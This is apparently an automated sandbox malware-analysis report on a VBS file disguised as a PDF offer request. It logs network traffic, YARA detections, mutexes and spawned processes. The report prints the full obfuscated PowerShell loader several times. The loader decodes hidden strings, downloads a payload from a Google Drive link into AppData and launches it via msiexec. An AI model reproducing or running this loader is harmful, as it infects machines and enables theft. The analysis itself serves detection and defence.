              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000004.00000002.1344746282.000002258049F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.000002258049B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1344746282.0000022580483000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765185620.0000000000687000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.1765254963.0000000000687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.10:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.10:49685 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.10:49687 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.10:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.10:49697 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000010.00000002.1859072664.000000000064C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7632, type: MEMORYSTR

              System Summary

              barindex
              Source: amsi64_4504.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7356.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 4504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7356, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esu
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuJump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB066CD124_2_00007FFCB066CD12
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCB066BF664_2_00007FFCB066BF66
              Source: ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6247
              Source: unknownProcess created: Commandline size = 6247
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6247Jump to behavior
              Source: amsi64_4504.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7356.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7356, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@13/13@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Squarely154.GenJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-5VYA3J
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qb5nkfyh.fud.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7356
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsVirustotal: Detection: 16%
              Source: ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbsReversingLabs: Detection: 15%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ANGEBOTSANFRAGE (Universit#U00e4t Klagenfurt) 10-03-2025#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esu
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL parOKv.kbKamgAAlmaLVanr:FodeuE akdOutbFLeucLHutuaDiktaCayadStilDOlymESterNForne th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Uncaramelised;function Spuledes($Soncy){ .($Industrivirksomheders) ($Soncy)} function Paining($Kortform){$Suprascapular225=4;do{$Ancientest+=$Kortform[$Suprascapular225];$Suprascapular225+=5;$Rockerkrig=Format-List} until(!$Kortform[$Suprascapular225])$Ancientest}$Strghandlen=Paining 'ErhvNPouleHje TCere.Enclw';$Strghandlen+=Paining 'SneaEBrugbBla cOv rLFin iPr eE ArgNKelpT';$cravenhearted=Paining ' pplMSt roBenezScoriAraplOverlOweraUdvi/';$where=Paining ' GerT Retl HydsBitt1Fast2';$Cellobiose='Carl[Ch.rnSmaaeSo ftMono.EngrSAlfaeA.skr l,nvLy tIOverCSammEp.akp,espoTid,ISu gNB gfTAfseMSoc ABroenCensA uslGMobieSljfr.air]C mo:Mosa:PolySEsurESpekcRrinuB,koRKe tiRecotStvdyEa ePTrevrSparoDyflTEgneOTrapCBlokO KryLTryk=S.ua$,uscwBos Hstnke IterD.agE';$cravenhearted+=Paining 'A,th5 Amy.Hogn0galg Emp(KontW CapiSk.fnContd.yreoKo pw,redsUnna MensNUretTBust Beha1Sass0Data..ppl0Staa; For SmagW DisiFestn Til6 ol4Ufo,;Gyps ssex Nar6Sven4Amat;M ka ktt.rTeknvMene:afko1Inve3linj4Cont. M,v0Sept)Sex, CrocGSpyteTtnecAirvkNe.eodato/Uku.2 ou0Fors1Paar0 Cum0 Dag1Dipo0Impr1Hypn LeaF evii ammrBraeeBr,mf Hygo BruxOro./T yk1Ajou3T np4Hogf.Ni e0';$Unfauceted=Paining 'Roc.UMe,aSBy.neT.kbREven-GreeAPortG BraE PhenOrdst';$Disbursable=Paining 'Pa thMetetBiblt,rivpF,rssC.ar: For/ Je,/SyridAilcrAbsyiFrasvForleHove.SnvrgRickoU,saoSk vg CanlOxmaedi,t. islcGentoEnf mRaah/G leuTaalcTwan?.taveConrx .mvp.steoSrh rCarptEmpi=Hvisd HetoFredwMissn entlRepaoabsta P.rdTilb&Ariai Sard Fr,=Kbte1 Ilmi Mu 7LgbrdAlt.wAkk fVig RBlokP BemhBemavFejl9B.utuObol6 ktiAR lsAA,sudBorg6 MosiUniorNavaYUtilY Fil6Def 3HumdbDiktwH dgG Fo,YS.ceeAttr4conc-Simp0 rivQF lkC';$Benzinmotorernes=Paining 'Ere >';$Industrivirksomheders=Paining 'VauliEav Etanyx';$Samfundshjlperens='Fredningsplanerne';$Cocoon='\Squarely154.Gen';Spuledes (Paining ' A,s$miljgBrnel udeOFlorB hura Till ,nh:Tri,pHarmASoutV tiiOut NDrecSRut =Bonn$Af.aeFlinnPensV ur:AccrASirtpVag.p FerDSemiaPrept Hica Wee+Out.$AubacErytOA.ymcUngaoBo,yoGa,nn');Spuledes (Paining ' R.g$ micgR jsLSatsOGophB oorATantla ba: Sc mInfiA umMKapsmD ngOrundN rkeISekuSAfklMpart=Fork$T ssD KafiRailSPachB Co uAlloRHin ST lgaA taBRygtlulveE ve.Con,S,salp ummLKbeliBemgT Tri( ndi$Wel b .lieOpk nPee,Z sa.IAdeln ResMBremoD,aiTT psOUnterAfg eWo dRFin.NEth e l gsford)');Spuledes (Paining $Cellobiose);$Disbursable=$Mammonism[0];$forevigende=(Paining 'L ce$Rbd GCherL 